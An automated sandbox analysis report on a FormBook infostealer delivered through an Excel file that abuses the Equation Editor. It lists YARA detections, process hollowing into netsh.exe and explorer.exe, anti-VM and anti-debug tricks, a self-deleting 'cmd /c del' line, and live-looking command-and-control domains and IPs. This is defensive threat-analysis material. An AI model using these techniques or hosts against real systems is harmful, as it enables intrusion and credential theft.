Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/19@6/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$oustanding 03082921.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE629.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: oustanding 03082921.xlsx ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: oustanding 03082921.xlsx Static file information: File size 1328640 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C836 push es; retf 6_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; retf 0001h 6_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; ret 6_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C976 push es; retn 0001h 6_2_0137CBA3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; iretd 6_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; retf 6_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 push es; retf 0001h 6_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137C9C6 push es; ret 6_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 6_2_004078F4 push esp; ret 6_2_004078FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B6C0 push es; iretd 6_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B2A2 push cs; ret 7_2_0041B2A3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415414 push esp; ret 7_2_00415416
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414F46 push cs; ret 7_2_00414F47
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BF12 push dword ptr [8427D5C5h]; ret 7_2_0041C1FF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415FC5 push ebp; ret 7_2_00415FC6
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; retf 0001h 7_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; ret 7_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C976 push es; retn 0001h 7_2_0137CBA3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C9C6 push es; ret 7_2_0137CB53
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137C836 push es; retf 7_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; iretd 7_2_0137C833
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; retf 7_2_0137C973
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 push es; retf 0001h 7_2_0137C9C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CDFA1 push ecx; ret 7_2_008CDFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B6C0 push es; iretd 7_2_0137C833
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204DFA1 push ecx; ret 9_2_0204DFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B2A2 push cs; ret 9_2_0020B2A3
Source: initial sample Static PE information: section name: .text entropy: 6.91186053545

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3020, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000001F85E4 second address: 00000000001F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000001F896E second address: 00000000001F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3008 Thread sleep time: -43005s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2808 Thread sleep time: -32000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 43005
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2169813021.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B10 LdrLoadDll, 7_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D26F8 mov eax, dword ptr fs:[00000030h] 7_2_008D26F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020526F8 mov eax, dword ptr fs:[00000030h] 9_2_020526F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe Network Connect: 163.44.239.73 80
Source: C:\Windows\explorer.exe Domain query: www.iotcloud.technology
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Network Connect: 23.82.57.32 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.micheldrake.com
Source: C:\Windows\explorer.exe Domain query: www.adultpeace.com
Source: C:\Windows\explorer.exe Network Connect: 78.31.67.91 80
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: C00000
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY